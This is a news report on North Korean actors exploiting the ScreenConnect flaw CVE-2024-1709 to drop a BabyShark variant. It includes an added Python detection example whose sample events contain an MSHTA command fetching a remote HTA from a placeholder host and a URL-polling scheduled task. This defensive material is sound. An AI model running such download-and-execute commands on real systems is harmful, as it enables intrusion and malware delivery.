Threat actors have been exploiting a previously disclosed flaw in ScreenConnect in order to deploy a variant of known malware that has been associated with the Kimsuky North Korean threat group.
The ScreenConnect authentication bypass flaw (CVE-2024-1709) affects all versions below 23.9.8, and since its disclosure last Monday researchers have reported a number of exploitation attempts. Kimsuky, a group that has previously targeted think tanks, academic institutions and news media organizations, is the most recent threat actor to target the flaw, and researchers with Kroll who uncovered this recent campaign - which they were able to detect and stop - warned users of ConnectWise’s software to patch immediately.
“The list of threat actors utilizing the ScreenConnect vulnerability CVE-2024-1709 for initial access is growing,” said Keith Wojcieszek, George Glass and Dave Truman, with Kroll, in a Tuesday analysis. “The malware being deployed in this case uses execution through a legitimate Microsoft binary, MSHTA, and exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing the position of code via generated junk code and using uniquely generated C2 URLs, which could make this malware hard to detect in some environments.”
The threat actors gained access to a targeted workstation by exploiting the exposed setup wizard of the ScreenConnect application, said researchers. As part of its post-compromise activity, the group deployed new malware via an initial payload downloaded by the Windows-native MSHTA binary, which is designed to execute Microsoft HTML Application files.
“The function names, variable names, junk code and hexadecimal change each time the initial payload is downloaded, meaning the hash of the file being downloaded will never be the same twice,” said researchers. “The addition of a random number of lines of junk code containing randomized strings will also obfuscate the meaningful code within the malware.”
Researchers said that the code and behavior of the malware resembles the VBScript-based BabyShark malware, which was uncovered in 2018 in spear-phishing campaigns associated with North Korean threat actors. This malware has been known for exfiltrating system information to the C2 server and maintaining persistence. In this campaign, the variant of BabyShark exfiltrates data related to host, user, network and security software information, as well as installed software and running processes. The malware also sets up a scheduled task requesting a URL every minute - however, “during Kroll’s testing, the data returning from the URL in the scheduled task was not observed.”
“Kroll assessed with medium confidence that this occurred because the URL may only return code if the information gathered and sent back indicates a compromised host that meets the threat actors’ criteria,” said researchers. “If this were the case, the scheduled task would act as a rudimentary loader for a further stage of malware with the unique base64 string within the URL acting as unique host identifier of sorts.”
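Because the payload's hash changes on every download, the behaviours Kroll describes (MSHTA executing a remote HTA, and a scheduled task requesting a URL every minute) are a more durable basis for detection than file hashes. The following is an added illustration, not Kroll's code or tooling: it triages constructed process-creation and task-creation events against those two behaviours and checks an installed ScreenConnect version against the 23.9.8 fix threshold. The event field names, the `example.invalid` URLs and the sample events are all constructed for this example.

```python
"""Behaviour-based triage for the MSHTA/scheduled-task activity described above.

Added example. The event schema (type, image, command_line, interval,
action) and the sample events are constructed; map them to your own
telemetry (e.g. process-creation and task-creation logs) before use.
"""
import re

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
FIRST_FIXED = (23, 9, 8)  # ScreenConnect versions below this are affected


def is_vulnerable_version(version: str) -> bool:
    """True when a dotted ScreenConnect version string is below 23.9.8."""
    parts = tuple(int(p) for p in version.strip().split("."))
    return parts < FIRST_FIXED


def classify(event: dict) -> list[str]:
    """Return behavioural findings for one constructed event (may be empty)."""
    findings = []
    if event.get("type") == "process_create":
        image = event.get("image", "").lower()
        cmd = event.get("command_line", "")
        # mshta.exe normally runs local .hta files; a URL argument is the
        # download-and-execute pattern described in the article.
        if image.endswith("mshta.exe") and URL_RE.search(cmd):
            findings.append("mshta.exe executing remote HTA")
    elif event.get("type") == "task_create":
        # A task that fetches a URL once a minute matches the polling
        # loader behaviour; PT1M is the ISO 8601 form of a one-minute interval.
        if event.get("interval") == "PT1M" and URL_RE.search(event.get("action", "")):
            findings.append("scheduled task polling a URL every minute")
    return findings


def triage(events: list[dict]) -> list[tuple[str, str]]:
    """Flatten findings across events as (event id, finding) pairs."""
    return [(e["id"], f) for e in events for f in classify(e)]


# Constructed sample telemetry: two benign events and two matching the pattern.
SAMPLE_EVENTS = [
    {"id": "1", "type": "process_create", "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe http://stage.example.invalid/init.hta"},
    {"id": "2", "type": "process_create", "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"mshta.exe C:\Tools\inventory.hta"},
    {"id": "3", "type": "task_create", "interval": "PT1M",
     "action": "http://poll.example.invalid/aG9zdC1pZC1wbGFjZWhvbGRlcg=="},
    {"id": "4", "type": "task_create", "interval": "P1D",
     "action": r"C:\Scripts\backup.cmd"},
]
```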
As threat actors continue to target the ScreenConnect flaw in campaigns like this one, Kroll researchers urged companies running ConnectWise ScreenConnect versions 23.9.7 and prior to “assume compromise” and patch immediately. Additionally, “consider an independent threat hunt/compromise assessment be completed on your systems to ensure that suspicious activity or malware was not inserted prior to patching or remediation,” according to researchers.